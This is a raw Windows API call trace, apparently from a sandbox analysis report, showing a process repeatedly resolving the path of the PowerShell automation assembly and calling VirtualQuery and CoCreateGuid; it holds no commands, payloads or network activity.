	[0401.971] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c7f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.972] VirtualQuery (in: lpAddress=0x28b9f0, lpBuffer=0x28c8b0, dwLength=0x30 | out: lpBuffer=0x28c8b0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0401.972] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.972] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c7f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.972] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c7f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.972] CoCreateGuid (in: pguid=0x28d730 | out: pguid=0x28d730*(Data1=0xf65ae672, Data2=0x9549, Data3=0x4894, Data4=([0]=0xb3, [1]=0xeb, [2]=0x77, [3]=0x80, [4]=0xf8, [5]=0x75, [6]=0x1d, [7]=0x58))) returned 0x0
	[0401.972] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28cbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.972] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28cb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.972] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28cb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.972] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28cbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.973] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28cb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.973] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28cb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.973] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28cbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.973] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28cb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.973] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28cb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.973] CoCreateGuid (in: pguid=0x28d730 | out: pguid=0x28d730*(Data1=0xddb20664, Data2=0x79cb, Data3=0x4dc2, Data4=([0]=0xbf, [1]=0x47, [2]=0x9, [3]=0xb7, [4]=0x4c, [5]=0x39, [6]=0x42, [7]=0xb7))) returned 0x0
	[0401.973] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28cbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.973] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28cb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.974] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28cb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.974] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28cbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.974] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28cb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.974] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28cb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.974] CoCreateGuid (in: pguid=0x28d730 | out: pguid=0x28d730*(Data1=0x2b7077e0, Data2=0xa497, Data3=0x4bba, Data4=([0]=0xaf, [1]=0xc8, [2]=0xf9, [3]=0xc1, [4]=0x26, [5]=0x50, [6]=0x8e, [7]=0x7e))) returned 0x0
	[0401.974] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28cbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.975] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28cb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.975] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28cb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.975] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28cbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.975] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28cb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.975] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28cb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.975] CoCreateGuid (in: pguid=0x28d730 | out: pguid=0x28d730*(Data1=0x89854a0, Data2=0x1695, Data3=0x4252, Data4=([0]=0x9e, [1]=0x78, [2]=0x72, [3]=0x5f, [4]=0x41, [5]=0x4, [6]=0x96, [7]=0xa5))) returned 0x0
	[0401.975] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28cbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.975] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28cb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.976] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28cb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.976] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28cbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.976] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28cb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.976] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28cb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.976] CoCreateGuid (in: pguid=0x28d730 | out: pguid=0x28d730*(Data1=0xab51fcf9, Data2=0xc412, Data3=0x4cdf, Data4=([0]=0xbd, [1]=0xe9, [2]=0xa, [3]=0x5a, [4]=0x55, [5]=0x8a, [6]=0xc9, [7]=0x4f))) returned 0x0
	[0401.976] CoCreateGuid (in: pguid=0x28d730 | out: pguid=0x28d730*(Data1=0x3ec86b12, Data2=0xecb4, Data3=0x42a0, Data4=([0]=0x85, [1]=0x6f, [2]=0xe4, [3]=0xe0, [4]=0x6c, [5]=0xd2, [6]=0x1b, [7]=0x3))) returned 0x0
	[0401.977] CoCreateGuid (in: pguid=0x28d730 | out: pguid=0x28d730*(Data1=0x1bbd4928, Data2=0xd4ad, Data3=0x4fca, Data4=([0]=0x81, [1]=0xc8, [2]=0xa2, [3]=0x98, [4]=0xf5, [5]=0xa2, [6]=0xa6, [7]=0xf2))) returned 0x0
	[0401.977] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28cbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.977] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28cb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.977] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28cb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.977] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28cbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.977] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28cb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.977] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28cb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.978] CoCreateGuid (in: pguid=0x28d730 | out: pguid=0x28d730*(Data1=0x1d34643b, Data2=0x8f6, Data3=0x4302, Data4=([0]=0xb1, [1]=0x73, [2]=0xab, [3]=0x8d, [4]=0xd3, [5]=0x7e, [6]=0xcf, [7]=0xd3))) returned 0x0
	[0401.978] VirtualQuery (in: lpAddress=0x28b5b0, lpBuffer=0x28c470, dwLength=0x30 | out: lpBuffer=0x28c470*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0401.978] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.978] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c080, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.978] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c080, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.978] VirtualQuery (in: lpAddress=0x28b5b0, lpBuffer=0x28c470, dwLength=0x30 | out: lpBuffer=0x28c470*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0401.978] VirtualQuery (in: lpAddress=0x28b640, lpBuffer=0x28c500, dwLength=0x30 | out: lpBuffer=0x28c500*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0401.979] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28bd70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.979] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28bcc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.979] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28bcc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.979] VirtualQuery (in: lpAddress=0x28b5b0, lpBuffer=0x28c470, dwLength=0x30 | out: lpBuffer=0x28c470*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0401.979] VirtualQuery (in: lpAddress=0x28b640, lpBuffer=0x28c500, dwLength=0x30 | out: lpBuffer=0x28c500*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0401.979] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28bd70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.979] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28bcc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.979] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28bcc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.980] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.980] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c080, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.980] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c080, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.980] VirtualQuery (in: lpAddress=0x28b5b0, lpBuffer=0x28c470, dwLength=0x30 | out: lpBuffer=0x28c470*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0401.980] VirtualQuery (in: lpAddress=0x28b640, lpBuffer=0x28c500, dwLength=0x30 | out: lpBuffer=0x28c500*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0401.980] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28bd70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.980] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28bcc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.980] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28bcc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.981] VirtualQuery (in: lpAddress=0x28b5b0, lpBuffer=0x28c470, dwLength=0x30 | out: lpBuffer=0x28c470*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0401.981] VirtualQuery (in: lpAddress=0x28b640, lpBuffer=0x28c500, dwLength=0x30 | out: lpBuffer=0x28c500*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0401.981] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.981] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c080, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
